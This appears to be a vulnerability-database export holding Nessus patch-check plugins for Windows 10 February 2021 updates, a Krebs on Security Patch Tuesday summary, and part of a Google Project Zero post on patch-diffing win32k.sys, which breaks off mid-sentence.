script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601345');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601345])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:17", "description": "The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24075, CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601319: Windows 10 version 2004 Feb 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601319.NASL", "href": "https://www.tenable.com/plugins/nessus/146345", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146345);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24075\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601319\");\n script_xref(name:\"MSFT\", value:\"MS21-4601319\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601319: Windows 10 version 2004 Feb 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24075,\n CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4601319\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4601319 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list(\n '4601319'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n|| \nsmb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-02-10T00:29:38", "description": "**Microsoft** today rolled out updates to plug at least 56 security holes in its **Windows** operating systems and other software. One of the bugs is already being actively exploited, and six of them were publicized prior to today, potentially giving attackers a head start in figuring out how to exploit the flaws.\n\n\n\nNine of the 56 vulnerabilities earned Microsoft's most urgent "critical" rating, meaning malware or miscreants could use them to seize remote control over unpatched systems with little or no help from users.\n\nThe flaw being exploited in the wild already -- [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732>) -- affects Windows 10, Server 2016 and later editions. It received a slightly less dire "important" rating and mainly because it is a vulnerability that lets an attacker increase their authority and control on a device, which means the attacker needs to already have access to the target system.\n\nTwo of the other bugs that were disclosed prior to this week are critical and reside in **Microsoft's .NET Framework**, a component required by many third-party applications (most Windows users will have some version of .NET installed).\n\nWindows 10 users should note that while the operating system installs all monthly patch roll-ups in one go, that rollup does not typically include .NET updates, which are installed on their own. So when you've backed up your system and installed this month's patches, you may want to check Windows Update again to see if there are any .NET updates pending.\n\nA key concern for enterprises is another critical bug in the DNS server on Windows Server 2008 through 2019 versions that could be used to remotely install software of the attacker's choice. [CVE-2021-24078](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24078>) earned [a CVSS Score](<https://nvd.nist.gov/vuln-metrics/cvss>) of 9.8, which is about as dangerous as they come.\n\n**Recorded Future** says this vulnerability can be exploited remotely by getting a vulnerable DNS server to query for a domain it has not seen before (e.g. by sending a phishing email with a link to a new domain or even with images embedded that call out to a new domain). **Kevin Breen** of **Immersive Labs** notes that CVE-2021-24078 could let an attacker steal loads of data by altering the destination for an organization's web traffic -- such as pointing internal appliances or Outlook email access at a malicious server.\n\nWindows Server users also should be aware that Microsoft this month is enforcing the second round of security improvements as part of a two-phase update to address [CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>), a severe vulnerability that [first saw active exploitation back in September 2020](<https://krebsonsecurity.com/2020/09/microsoft-attackers-exploiting-zerologon-windows-flaw/>).\n\nThe vulnerability, dubbed "**Zerologon**," is a bug in the core "**Netlogon**" component of Windows Server devices. The flaw lets an unauthenticated attacker gain administrative access to a Windows domain controller and run any application at will. A domain controller is a server that responds to security authentication requests in a Windows environment, and a compromised domain controller can give attackers the keys to the kingdom inside a corporate network.\n\nMicrosoft's [initial patch for CVE-2020-1472](<https://krebsonsecurity.com/2020/08/microsoft-patch-tuesday-august-2020-edition/>) fixed the flaw on Windows Server systems, but did nothing to stop unsupported or third-party devices from talking to domain controllers using the insecure Netlogon communications method. Microsoft said it chose this two-step approach "to ensure vendors of non-compliant implementations can provide customers with updates." With this month's patches, Microsoft will begin rejecting insecure Netlogon attempts from non-Windows devices.\n\nA couple of other, non-Windows security updates are worth mentioning. Adobe today [released updates to fix at least 50 security holes in a range of products](<https://blogs.adobe.com/psirt/?p=1965>), including Photoshop and Reader. The Acrobat/Reader update tackles a critical zero-day flaw that [Adobe says](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>) is actively being exploited in the wild against Windows users, so if you have Adobe Acrobat or Reader installed, please make sure these programs are kept up to date.\n\nThere is also a zero-day flaw in **Google's Chrome Web browser** (CVE-2021-21148) that is seeing active attacks. Chrome downloads security updates automatically, but users still need to restart the browser for the updates to fully take effect. If you're a Chrome user and notice a red "update" prompt to the right of the address bar, it's time to save your work and restart the browser.\n\nStandard reminder: While staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re less likely to pull your hair out when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nKeep in mind that Windows 10 by default will automatically download and install updates on its own schedule. If you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAnd as always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-02-09T22:37:19", "type": "krebs", "title": "Microsoft Patch Tuesday, February 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-1732", "CVE-2021-21148", "CVE-2021-24078"], "modified": "2021-02-09T22:37:19", "id": "KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "href": "https://krebsonsecurity.com/2021/02/microsoft-patch-tuesday-february-2021-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2021-07-30T19:23:15", "description": "Posted by Maddie Stone, Project Zero\n\n# INTRODUCTION\n\nI\u2019m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero\u2019s ideas and goals around in-the-wild 0-days in a [November blog post](<https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html>). \n\n** \n**\n\nOn December\u2019s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a [blog post](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.\n\n** \n**\n\nWithout the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.\n\n** \n**\n\nWhile my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It\u2019s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering, however I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.\n\n** \n**\n\nBut as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually [CVE-2019-1433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1433>). I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That\u2019s when I learned I\u2019d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a [detailed root cause analysis and POC for the \u201creal\u201d CVE-2019-1458 bug](<https://github.com/piotrflorczyk/cve-2019-1458_POC>). With the \u201creal\u201d root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.\n\n** \n**\n\nThis blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the \u201cwrong\u201d, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. This includes the root cause analysis for CVE-2019-1433, that I originally thought was the vulnerability for the in the wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.\n\n# MY PROCESS\n\nWhen the vulnerability was disclosed on December\u2019s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I\u2019m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn\u2019t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:\n\n 1. Complete details about the specific vulnerability weren't available,\n\n 2. It affected both Windows 7 and Windows 10, and\n\n 3. The vulnerability is in win32k which is a core component of the Windows kernel.\n\n** \n**\n\nI spent a few days trying to get a copy of the exploit, but wasn\u2019t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons:\n\n 1. The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This \u201cnoise\u201d includes things like [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), more inline instrumentation calls, and \u201cweirder\u201d compiler settings. \n\n 2. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.\n\n 3. Kaspersky\u2019s blog post stated that not all Windows 10 builds were affected.\n\n** \n**\n\nI got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.\n\n** \n**\n\nTurns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked \u201cCheck for Updates\u201d within the VM. Because I was new to Windows, I didn\u2019t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Home.aspx>). When Microsoft told me that I had analyzed the wrong vulnerability, that\u2019s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn\u2019t have gotten mixed up.\n\n** \n**\n\nOnce the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\\Windows\\System32\\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.\n\n** \n**\n\nWin32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it\u2019s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around.\n\n** \n**\n\nOn James Foreshaw\u2019s recommendation, I cloned my VM so that one VM would run [WinDbg](<https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg--kernel-mode->) and debug the other VM. This allows for kernel debugging.\n\n** \n**\n\nNow that I had a copy of the supposed patched and supposed vulnerable versions of win32k.sys, it\u2019s time to start patch diffing.\n\n## PATCH DIFFING WINDOWS 7 WIN32K.SYS\n\nI decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [[video](<https://thecyberwire.com/stories/Maddie-Stone-Whatsup-with-WhatsApp-A-Detailed-Walk-Through-of-Reverse-Engineering-CVE-2019-3568.html>), [slides](<https://github.com/maddiestone/ConPresentations/raw/master/Jailbreak2019.WhatsUpWithWhatsApp.pdf>)], and for me, BinDiff worked best \u201cout of the box\u201d so I decided to at least start with that again.\n\n** \n**\n\nI loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn\u2019t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. (Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)\n\n \n\n\n[](<https://1.bp.blogspot.com/-aVhnHuLjSCo/XoYOV0ev26I/AAAAAAAAPbw/atN5FMEnaS0CkZghfKU1LjoNB1ot9LoggCNcBGAsYHQ/s1600/1_Bindiff-noSymbols.png>)\n\n \n\n\nOriginal BinDiff Matched Functions of win32k.sys without Symbols\n\n** \n**\n\nWhen I started the diff, I didn\u2019t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn\u2019t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren\u2019t running IDA on a Windows computer. So after running the WinDBG command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-GW0vp_mg4m0/Xpto5bZmk8I/AAAAAAAAPhs/9tdNfmFEo7oux9cM1WD1df0BNg_P7hG8gCNcBGAsYHQ/s1600/2_Bindiff-Symbols%2B%25281%2529.png>)\n\n \n\n\nBinDiff Matched Function of win32k.sys with Symbols\n\n** \n**\n\nWhat stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky\u2019s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn\u2019t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn\u2019t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions:\n\n * CreateSurfacePal \\- [CVE-2019-1362](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1362>)\n\n * RFONTOBJ::bInsterGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ \\- [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>)\n\n** \n**\n\n## EXPLORING THE WRONG CHANGES\n\nAt this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had \u201cbitmap\u201d in the name and Kaspersky\u2019s blog post talked about the use of bitmaps.\n\n** \n**\n\nThe changes to GreGetStringBitmapW didn\u2019t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the Bindiff image above. In the Dec 2019 win32k.sys its offset from base address is 0x22F200.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-SliC7FMJvbA/Xpto5X5btDI/AAAAAAAAPhk/2_35zFpN7AMMbQCMSEzrikeN2bZpmc4ewCNcBGAsYHQ/s1600/3_Bindiff%2Bfor%2Bvuln%2Bfunction%2B%25281%2529.png>)\n\n** \n**\n\nAs shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it\u2019s called from a function with bitmap in the name and appears that there would be a way to overrun a buffer.\n\n** \n**\n\nI decided to keep reversing and spent a few days on this change. I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that \u201cbitmap\u201d was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-mB6GU5FDVxc/Xpto5V4kkFI/AAAAAAAAPho/W7W9o3LFX2oM2PTjgcsPXBeAEJ05JY17wCNcBGAsYHQ/s1600/4_Call%2Bgraph%2Bto%2Bvuln_sub%2B%25281%2529.png>)\n\n \n\n\n** \n**\n\nThe Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls [here](<https://j00ru.vexillium.org/syscalls/win32k/64/>). Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported.\n\n** \n**\n\nTracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn\u2019t be called when calling the functions listed in the blog post or trigger the task switch window.\n\n** \n**\n\nI downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following [this guide](<https://docs.microsoft.com/en-us/cpp/windows/walkthrough-creating-windows-desktop-applications-cpp?view=vs-2019>). Once I had a working \u201cHello, World\u201d, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the \u201cSwitch\u201d window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.\n\n** \n**\n\nI then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the \u201chighlight\u201d to the different windows each time you press tab. I thought that, \u201cSure, that could involve animating a palette\u201d, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn\u2019t spend too long and moved on.\n\n** \n**\n\n## NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent\n\nAfter these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky\u2019s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.\n\n[](<https://1.bp.blogspot.com/-feXJTEAgl44/Xpto6OfKniI/AAAAAAAAPhw/jYsbKf5Cbf4f2pMxfw4p84PjMYyoaVmrACNcBGAsYHQ/s1600/5_Cross-refs%2Bto%2BDrawSwitchWndHilite%2B%25281%2529.png>)\n\n** \n**\n\nAs shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that lead to a call to DrawSwitchWndHilite so I started reversing to understand the changes.\n\n** \n**\n\n## REVERSING THE VULNERABILITY\n\nI had gotten 